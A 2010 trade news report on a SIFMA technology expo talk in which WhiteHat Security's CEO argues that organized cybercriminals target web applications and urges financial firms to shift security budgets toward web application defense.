SIFMA TECH 2010: Black Hats Outspending White Hats?
June 24, 2010
Professional hackers are now motivated by the same compulsion as Wall Street: Making money.
And they are not just in the habit of out-thinking defenders of financial systems. They may be outspending them as well, an expert said Thursday at the Securities Industry and Financial Markets Association 2010 Financial Services Technology Expo in New York.
The popular image of a lone hacker attacking sites, from a personal computer in a bedroom is out of date, said Stephanie Fohn, the chief executive of WhiteHat Security,
in discussing "Proven Methods to Combat the Web Attacks That Plague the Financial Services Industry. Now, hackers work in worldwide collaboration, organized criminals in a digitally-driven age, she said.
"The enemy is very well organized, very well funded and very focused on making money,'' Fohn said.
In fact, since 2004, organized crime has made more from the sale of data than it has from the sale of drugs, she said. In 2009, the take was an estimated $1 trillion, she said, citing a repor to the U.S. Senate Commerce Committee.
Seventy percent of the largest 100 web sites have been compromised, she said, and theft of data by grabbing user information through Web sites persists. Heartland Payment Systems, which lost control of 130 million records, has paid out roughly $140 million in settlements and fines, as a result.
Fohn could not cite any specific examples of securities firms' whose sites or customer records have been compromised through tactics such as injecting scripts into Web site through forms, search windows and such openings.
But she contended that firms need to switch spending from internal and network security into Web application security, since that's where attacks from organized hacking groups are concentrated.
She said only 18 percent of firms' technology security budgets were allocated to the threat posed by insecure Web applications, while 43 percent went to network and hosting security.
The also said a majority of firms, 70 percent, do not view Web application security as a strategic initiative. Most firms find their developers are too busy to respond to security issues and, budgetwise, are spending 10 times as much on firewalls and virtual private networks for employees to use, as they do on Web site security.
Her prescription for protecting Web sites:
- Inventory them. You canʼt secure sites you donʼt know you own.
- Prioritize uses. Figure out which Web applications and what data is most at risk.
- Define risk. Define risk as: where attackers can exploit the money or data transacted.
- Assign a champion. Designate a top executive to own and drive data security and the numerous teams needed for investigation and defense.
- Keep track of breaches and defenses. Accountability produces performance.
- Donʼt wait for developers to take charge of security. Deploy shielding technologies to mitigate the risk of vulnerable Web applications, immediately.
- Budget accordingly. Don't wait for the big breach to occur. Shift, if need be, spending from internal infrastucture to Web application security.
